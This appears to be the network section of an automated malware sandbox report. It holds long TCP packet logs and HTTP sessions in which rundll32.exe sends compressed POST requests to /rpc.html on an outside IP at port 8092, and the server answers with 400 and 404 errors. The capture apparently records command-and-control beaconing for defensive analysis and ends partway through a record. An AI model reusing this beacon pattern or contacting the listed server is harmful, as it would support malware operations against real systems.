                                                                                                                                                                                                                    Sep 27, 2024 11:20:30.598642111 CEST497468092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:30.603923082 CEST809249746203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:30.604021072 CEST497468092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:30.674983025 CEST809249747203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:30.686956882 CEST809249748203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:30.688055038 CEST497478092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:30.688142061 CEST497488092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:30.693289995 CEST809249747203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:30.693377972 CEST497478092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:30.693646908 CEST809249748203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:30.693703890 CEST497488092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:31.568361044 CEST497498092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:31.573540926 CEST809249749203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:31.573786974 CEST497498092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:31.575443029 CEST497498092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:31.581386089 CEST809249749203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:32.544504881 CEST809249749203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:32.544747114 CEST497498092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:32.549866915 CEST809249749203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:32.549957991 CEST497498092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:32.568182945 CEST497508092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:32.572948933 CEST809249750203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:32.573024988 CEST497508092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:32.574444056 CEST497508092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:32.579205036 CEST809249750203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:33.552536011 CEST809249750203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:33.570204973 CEST497508092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:33.575454950 CEST809249750203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:33.575696945 CEST497508092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:34.218601942 CEST497518092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:34.223516941 CEST809249751203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:34.223644972 CEST497518092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:34.225265026 CEST497518092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:34.231870890 CEST809249751203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:35.231462955 CEST809249751203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:35.231723070 CEST497518092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:35.236882925 CEST809249751203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:35.236928940 CEST497518092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:35.244057894 CEST497528092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:35.248939991 CEST809249752203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:35.249037981 CEST497528092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:35.249691010 CEST497528092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:35.254455090 CEST809249752203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:36.235466957 CEST809249752203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:36.250197887 CEST497528092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:36.256428003 CEST809249752203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:36.256484985 CEST497528092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:37.329711914 CEST497538092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:37.334673882 CEST809249753203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:37.334783077 CEST497538092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:37.335661888 CEST497538092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:37.340457916 CEST809249753203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:38.321647882 CEST809249753203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:38.321886063 CEST497538092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:38.326973915 CEST809249753203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:38.327033043 CEST497538092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:38.336997032 CEST497548092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:38.341909885 CEST809249754203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:38.342005014 CEST497548092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:38.342720032 CEST497548092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:38.347624063 CEST809249754203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:38.347649097 CEST809249754203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:38.347662926 CEST809249754203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:39.312338114 CEST809249754203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:39.329950094 CEST497548092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:39.335401058 CEST809249754203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:39.335499048 CEST497548092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:21:30.591568947 CEST497558082192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:21:30.596467972 CEST808249755203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:21:30.596560001 CEST497558082192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:21:30.597565889 CEST497558082192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:21:30.602348089 CEST808249755203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:21:30.663897991 CEST497568082192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:21:30.668777943 CEST808249756203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:21:30.668872118 CEST497568082192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:21:30.669878006 CEST497568082192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:21:30.674763918 CEST808249756203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:21:30.704641104 CEST497578082192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:21:30.710365057 CEST808249757203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:21:30.710480928 CEST497578082192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:21:30.711585045 CEST497578082192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:21:30.717283964 CEST808249757203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:21:32.782881975 CEST808249755203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:21:32.782980919 CEST497558082192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:21:32.783119917 CEST497558082192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:21:32.789704084 CEST808249755203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:21:32.914268017 CEST808249756203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:21:32.914427042 CEST497568082192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:21:32.914671898 CEST497568082192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:21:32.919431925 CEST808249756203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:21:33.557368994 CEST497588082192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:21:33.870322943 CEST808249758203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:21:33.870413065 CEST497588082192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:21:33.871221066 CEST497588082192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:21:33.876425028 CEST808249758203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:21:35.126841068 CEST808249757203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:21:35.126929045 CEST497578082192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:21:35.127062082 CEST497578082192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:21:35.131854057 CEST808249757203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:21:36.053749084 CEST808249758203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:21:36.053868055 CEST497588082192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:21:36.054016113 CEST497588082192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:21:36.059864044 CEST808249758203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:21:36.243892908 CEST497598082192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:21:36.248858929 CEST808249759203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:21:36.248949051 CEST497598082192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:21:36.253679037 CEST497598082192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:21:36.258462906 CEST808249759203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:21:38.392905951 CEST808249759203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:21:38.393053055 CEST497598082192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:21:38.393148899 CEST497598082192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:21:38.397980928 CEST808249759203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:21:39.316889048 CEST497608082192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:21:39.322041988 CEST808249760203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:21:39.322144985 CEST497608082192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:21:39.343727112 CEST497608082192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:21:39.348726034 CEST808249760203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:21:41.599073887 CEST808249760203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:21:41.599292040 CEST497608082192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:21:41.599375010 CEST497608082192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:21:41.604794979 CEST808249760203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:22:32.834393978 CEST497618092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:32.839371920 CEST809249761203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:22:32.839449883 CEST497618092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:32.840303898 CEST497618092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:32.845185041 CEST809249761203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:22:32.934081078 CEST497628092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:33.079744101 CEST809249762203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:22:33.079869986 CEST497628092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:33.083421946 CEST497628092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:33.088382006 CEST809249762203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:22:33.785480022 CEST809249761203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:22:33.787210941 CEST497618092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:33.792442083 CEST809249761203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:22:33.792498112 CEST497618092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:33.799369097 CEST497638092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:33.804395914 CEST809249763203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:22:33.804475069 CEST497638092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:33.804893970 CEST497638092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:33.809737921 CEST809249763203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:22:34.043689013 CEST809249762203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:22:34.043956995 CEST497628092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:34.049098969 CEST809249762203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:22:34.049156904 CEST497628092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:34.056555986 CEST497648092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:34.061448097 CEST809249764203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:22:34.061573982 CEST497648092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:34.061904907 CEST497648092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:34.066732883 CEST809249764203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:22:34.754260063 CEST809249763203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:22:34.774431944 CEST497638092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:34.779676914 CEST809249763203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:22:34.779776096 CEST497638092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:35.030294895 CEST809249764203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:22:35.047082901 CEST497648092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:35.052295923 CEST809249764203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:22:35.052391052 CEST497648092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:35.148839951 CEST497658092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:35.155817032 CEST809249765203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:22:35.155944109 CEST497658092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:35.157107115 CEST497658092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:35.162026882 CEST809249765203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:22:36.081693888 CEST497668092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:36.083379030 CEST809249765203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:22:36.083623886 CEST497658092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:36.086769104 CEST809249766203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:22:36.086863041 CEST497668092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:36.087585926 CEST497668092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:36.088762045 CEST809249765203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:22:36.088855028 CEST497658092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:36.092426062 CEST809249766203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:22:36.100171089 CEST497678092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:36.105375051 CEST809249767203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:22:36.105484009 CEST497678092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:36.107408047 CEST497678092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:36.112740993 CEST809249767203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:22:37.071223021 CEST809249767203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:22:37.073476076 CEST809249766203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:22:37.073717117 CEST497668092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:37.076556921 CEST497678092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:37.079173088 CEST809249766203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:22:37.079257011 CEST497668092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:37.081669092 CEST809249767203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:22:37.081736088 CEST497678092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:37.100183010 CEST497688092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:37.105014086 CEST809249768203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:22:37.105096102 CEST497688092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:37.105524063 CEST497688092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:37.110335112 CEST809249768203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:22:38.055094957 CEST809249768203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:22:38.064007044 CEST497688092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:38.069334984 CEST809249768203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:22:38.069401979 CEST497688092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:38.438329935 CEST497698092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:39.392088890 CEST809249769203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:22:39.392241001 CEST497698092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:39.393290997 CEST497698092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:39.398008108 CEST809249769203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:22:40.350692034 CEST809249769203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:22:40.350858927 CEST497698092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:40.357012987 CEST809249769203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:22:40.357070923 CEST497698092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:40.361723900 CEST497708092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:40.366547108 CEST809249770203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:22:40.366632938 CEST497708092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:40.367018938 CEST497708092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:40.371761084 CEST809249770203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:22:41.364435911 CEST809249770203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:22:41.381913900 CEST497708092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:41.388238907 CEST809249770203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:22:41.388880968 CEST497708092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:41.619261980 CEST497718092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:41.624172926 CEST809249771203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:22:41.624320030 CEST497718092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:41.626071930 CEST497718092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:41.630985975 CEST809249771203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:22:42.592505932 CEST809249771203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:22:42.592873096 CEST497718092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:42.605313063 CEST809249771203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:22:42.605375051 CEST497718092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:42.612941980 CEST497728092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:42.624924898 CEST809249772203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:22:42.625015020 CEST497728092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:42.625525951 CEST497728092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:42.637048960 CEST809249772203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:22:43.579540014 CEST809249772203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:22:43.596271992 CEST497728092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:43.602870941 CEST809249772203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:22:43.602967024 CEST497728092192.168.2.4203.204.217.190

                                                                                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                                                                                    • 203.204.217.190:8092

                                                                                                                                                                                                                    HTTP Packets

                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    0192.168.2.449743203.204.217.19080927488C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    Sep 27, 2024 11:20:29.626269102 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                    Data Ascii: 400 Bad Request


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    1192.168.2.449746203.204.217.19080927488C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    Sep 27, 2024 11:20:29.652786970 CEST1493OUTPOST /rpc.html?o=7v7059308&sc=67086726 HTTP/1.1
                                                                                                                                                                                                                    Host: 203.204.217.190:8092
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.2012.125 Safari/537.36
                                                                                                                                                                                                                    Content-Length: 1209
                                                                                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                    Data Raw: 1f 8b 08 00 00 00 00 00 04 ff 64 96 51 b2 e2 bc 0e 84 b7 a2 ad 28 76 27 d1 c1 b6 3c 92 0c 13 f6 bf 90 5b 26 43 e0 dc ff 85 82 22 71 5a ea af a5 b8 d4 22 8d a4 fd 20 85 68 73 f2 9b 54 5d a4 20 53 d2 5d 4b 86 39 99 0e 38 2d 23 02 b6 72 50 1f 96 76 76 d0 52 54 b3 c0 83 aa 78 d6 b1 84 b4 8d 0a 07 1a 32 79 80 f3 ca 1e 0d ee 70 6a 90 6d 47 26 1e a1 a6 23 40 95 47 45 98 c0 e9 87 ad 38 ad aa e1 a1 e9 46 dd 8f b4 4b db 68 e7 27 37 a7 8a 12 0f 0e 98 93 71 7e b0 07 9c 62 17 1d c6 49 8a d3 83 03 b6 16 d5 8c 4c 2e 36 ba d3 9f 21 2d 46 2f 08 8a 5d d2 6d 07 67 64 f2 3f 83 a3 1c b4 a3 8a f7 1d 06 27 ef b2 ae b4 a1 05 57 49 d2 e8 87 db 36 db d0 b4 6d 85 0d 4e 86 9d 17 1a b5 8b cd 32 0d 3f e3 8e c6 a1 46 49 47 0b 58 a0 65 b4 74 50 d2 87 da 0d 46 1b 2f 2b 3c 9c 92 71 d7 c2 4e 15 dc a4 6d 4e a3 bb 3c a5 6d 94 25 e7 02 73 f2 51 0a 5a 99 b7 b7 15 56 d1 c2 89 5b 48 d5 76 50 06 f2 41 e9 c9 f6 69 ce 29 c9 75 b4 3c 25 79 b0 ad e2 fb bf 6b 5d fb 2e 1e 92 38 90 cb 41 1d 2d 38 15 bc e5 de 45 0b 5a 9a bf ff c9 dd 47 db f4 0e 23 [TRUNCATED]
                                                                                                                                                                                                                    Data Ascii: dQ(v'<[&C"qZ" hsT] S]K98-#rPvvRTx2ypjmG&#@GE8FKh'7q~bIL.6!-F/]mgd?'WI6mN2?FIGXetPF/+<qNmN<m%sQZV[HvPAi)u<%yk].8A-8EZG#UezcKnHju6s)m-?pJG$6<aJ'}R@rpR`>ZY350>?}KvX'$c"3dz]&U3(e;ZT04k5X$(qq`=Un]8kOc)tW*/O~viYiE$2amz4._J@&KI~B+?d6~wR}O]9[4uUW2yY{_e{eyTE4z<?3R`v.~qLG2~z5z>>('@^]W,Xt.tC,FE `R9[]tDM74Is$:xCgi'Y)iZQ{&Eo5 YOme1"tGwv5j%aJSv1nA7,DiF)P?Y]vRKn/J,wR\3Z4uq [TRUNCATED]
                                                                                                                                                                                                                    Sep 27, 2024 11:20:30.596457958 CEST82INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                    Date: Fri, 27 Sep 2024 09:20:30 GMT
                                                                                                                                                                                                                    Content-Length: 0


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    2192.168.2.449745203.204.217.19080927480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    Sep 27, 2024 11:20:29.673208952 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
